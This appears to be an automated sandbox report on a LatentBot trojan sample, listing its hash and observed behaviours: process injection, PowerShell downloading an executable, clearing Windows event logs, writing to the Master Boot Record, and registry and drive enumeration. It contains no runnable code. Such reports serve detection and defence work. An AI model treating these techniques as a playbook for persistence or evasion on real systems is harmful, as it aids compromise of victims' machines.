Malware Analysis Report

2025-05-28 17:58

Sample ID 250519-y7lxcack71
Target x69.exe
SHA256 8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6
Tags
latentbot bootkit defense_evasion execution persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8ead895e1e76dc258954703305da5eed934eb7744eddf4d1b481c70fddefcef6

Threat Level: Known bad

The file x69.exe was found to be: Known bad.

Malicious Activity Summary

latentbot bootkit defense_evasion execution persistence trojan

Latentbot family

LatentBot

Suspicious use of NtCreateUserProcessOtherParentProcess

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Downloads MZ/PE file

Blocklisted process makes network request

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Enumerates connected drives

Writes to the Master Boot Record (MBR)

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Modifies registry class

Checks processor information in registry

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-05-19 20:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-19 20:25

Reported

2025-05-19 20:26

Platform

win10v2004-20250502-en

Max time kernel

33s

Max time network

38s

Command Line

winlogon.exe

Signatures

LatentBot

trojan latentbot

Latentbot family

latentbot

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3160 created 616 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\system32\winlogon.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" C:\Windows\System32\WaaSMedicAgent.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\x69.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MasonKit.com N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonKit.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\x69.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\svchost.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\svchost.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Windows\system32\wbem\wmiprvse.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3160 set thread context of 4812 N/A C:\Users\Admin\AppData\Local\Temp\MasonR.bat C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\System32\mousocoreworker.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\System32\mousocoreworker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\System32\mousocoreworker.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} C:\Windows\System32\mousocoreworker.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000001209cc65e575574a97b97adb9dbab26a00000000020000000000106600000001000020000000f25a82842c4c4babdc3fefe8cccbac768e9883e01c99573f2bb9de5fb8aa45a3000000000e80000000020000200000006862a7591edf0b7814bb674242142e0853cbfabb6810c4f3f7d9384f57477e4b10060000c5f27dbc758d14b3ffa9d7e07b36bf9f11fd8b8d15d7480bbd0b89b422206364d369c78d872384681ddfe18d3a5c6a5504a07fe0a0c0ebb2508424b9dd880910f8edd057eb6f1de383dd60cb1cba03e0ae3fce86c0bbf48dbbca1d605a48ec1fede9333eb958530be467147cce3d443cd6ee9a91eb088ee01e0cf2e77f1ed120486caba750707ef8a41bc9a9c7063281298397d582b72dbd5ce0e3612508e7c089d9721e214c02a2ddace1e21642a7dabee1834e10d2d72ba696e0d7b8d3be4f5eded7fd8842edd640a3f5f9c3484367531f6a7348c5a2198024aac8a308d79380e649ed5ee7ed3b21d379c7398fabbf08f8658b068a77c94f27a9d1b0febb7037f406878490db9c6ddfcc085bf5627e88ecfb856a80d12ebfb749a9da7ba37cdff1b13adc3c75134b90cc2c44eb664f3ce89ba2edb18d6da347212178ba986d5335ae1603c3ae1defb6c7246214b92bc6038e8c18591d6893f09bf602210e73039631cacaa086350473395f053a47248d8b44da3cd83d112ae3ce0373ca26672e20766a879d4b0c7fd4b2f8f47ab88374f5c36d8e6b02a9c324b1141af8a74fd754e885b10e2fb463f8eb67686900a7d4cfa36efa1ee65165531d80c896c6fc58e18d886f2a8b13cde320521fcad115d67a8fe0c5fcddd1e4d4c697d1c80630b90003f90abc63dccca792cdb622e1c0ab8dd9888ad874f74b3172f0736210d70346ba939de016c5ddff3e84a093e51f5b0e02697f7b2126e7ce682a9ed05f265ab2ce7e3110d5e3911fdf51550a18e9cebde3a4dad93ce58bb7c87f02db9cd2e3fb58486395dcd5bc9fd5acfc8b689db5f5a57587507638e346a42a730214649f72249935008f9d86374743185735a2f2e0c8440e030bd32b5bd6b17780fbc4c4d7455fc32b6d84a9982cf077e7b6ad5ae68d5878c8b6a40d42a5ba35241322cb99a72bb2471807c90a998ff800b03e45009b998c2ef4e0eeb6d7140561cd02cd0aa8d4f02f227c798ad8978a64731ee1504413fcbc71ca7e2bb62578af5f48671d22b507722fb31eb6b284b7e13c037c30ecf6e0fbebfd8d0043ef900b5dc42c4b52728b4587890eb84fb908b440e960a48a09bc3ab8d0dc58b24d718be7114862f4e16c5cc3f48323d830c79c78e6d05d89347c2c9dc0e89ac5b849d2dbc7bc775e2e5be0d3ce5a704e5e6d9be768d45430b12eeafdd6efdadd4903604d883a4f7e7895f9c655a41fee7bacb9ebe360c61f76b3474c8a12ce07295532769446406e74daef972eac03f52efff0d5ae0ee7885c5c16370992098d8fd6bb185feeab6b44f38fa28df6075b9d57bfb66da8540dabec7da9271d343e5ee926bfb6970c8755697bbf98ef84cd295fcdaed27d30acef2dd3d768a1120d357589928040e3ff5b1fd5c9795ff074d19b562f114a654eb7b27c5caf5a4b0a086475993d607a2c45c212b3f7b544a7da349084d4b0ece04db09237d20a47e968b394e06cdbe53de94d579cdeebee34289ea10c433aaca22e3422249e1a59978077283f5de2cb5c5df9887ac0c52685eea42fe572abeaba92a173939e2609e3e20360c36be44bf3f426e251a23ce22ab84ee901d48f90a4e5352378f6e35bc39fc8272a405cfae16dccde64eaae0828a427d8fd642749613ad6e49435e19b1f40e90ed272fad5b0442671cc70fa48fef82e9d9b6259ffbd807e5eced5d08cf7fcd23a472f66901a02754cbc33ff188cdcaabc80041627141adaf3984ce13fd971de2449479cc05de40237231b39b9ec0768cf8d4249ec3ad8e2c4fbf721bfe06680948cfdfd87542d150c12fc70fb9dd4de0182fac05b76d40eee315902981ed41e2322f9a3c69ee3166d2f330c94e8d3b65a31a04445a1952c8a777456bfce41faf9101967496b2e902dc1a763f4633c791673cb0c6052b16c3c180e1fa4eaa99dcfb1e6daf02dffc927841fa3321e76e4024e3a1291a30436d621eb2fe3dd50f3422f611bcdb2ef903a9d1d0733a2fdd906546ae50b8834f96250732185a33da751e3622ad0fa8ca847bc8135f2246796734b32630ee3c148a390d5b57a9df3b29d40bd8080f7ab4934c2b82a8d6b681d4b14d32f8718520ab6c70aa56b29d025e8ad93424594771696512aea502863672247223dc8f7802ae75af114e9e846cde301a98d578a673551628d0141efc4ee3731ee40000000419ba2f93af25bba319798b4770e3ae5e965e0b7e72114c4c86b5fcf9a5016cbf11e5836d8d4a213062b2db32c780a115e73ea22a4fd32cb84b405be7130a15e C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018801257DB2EFD" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018801257DB2EFD" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018801257DB2EFD = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000001209cc65e575574a97b97adb9dbab26a00000000020000000000106600000001000020000000b3d2a232836f01318aa99879d6407517d5365bbb72cda89a8bb1c02de146493f000000000e8000000002000020000000284afc89753feb744c3c724bba119a24088eb4f7f89cca3e5b58e40b82fd386680000000842672f5c2845e39b330b4950d128f918c5c03f5e64e0560248f9cb64c55ffc21e816bc6f57b844084791ddfd9d03a968952a16b900997592f86d47c80029ebfb2f7b2fbc2b6e4a72be1d99b4980d144698a5cb9f42db6320e870c44e5439be856c8e9701b484dff3926c1c098348d40748cf1d592264231723d48532aa63165400000009b38227beeac9f1e2b921fdda60e2517b9622a05fd161fd9ab4cfe6514a33291456cd68a762c645a2fe7a1974301b197230383244ad25e5c55575ff652a82504 C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" C:\Windows\System32\mousocoreworker.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000068fc193afcc8db014283613afcc8db014283613afcc8db01130300000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000b35a3da32000633131353235656131656439643064373135396666373064626637663837626434373237313134376463666139323262623634653434623135343637353836380000b20009000400efbeb35a3da3b35a3da32e00000000000000000000000000000000000000000000000000d4a9b500630031003100350032003500650061003100650064003900640030006400370031003500390066006600370030006400620066003700660038003700620064003400370032003700310031003400370064006300660061003900320032006200620036003400650034003400620031003500340036003700350038003600380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000008c9cb60b1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63313135323565613165643964306437313539666637306462663766383762643437323731313437646366613932326262363465343462313534363735383638000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000062616d7564746b710000000000000000d0afe384b7e060428074769582fbd8402f6160966527f011b64c6674a9969650d0afe384b7e060428074769582fbd8402f6160966527f011b64c6674a9969650d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003300340032003500370036003700360033002d0031003900390038003400360035003500320036002d0033003800370030003200390035003500300031002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000002d544667000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\35408508-3d9f-42e4 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cd18cc83-b19c-490b = "\\\\?\\Volume{6746542D-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c11525ea1ed9d0d7159ff70dbf7f87bd47271147dcfa922bb64e44b154675868" C:\Windows\System32\RuntimeBroker.exe N/A
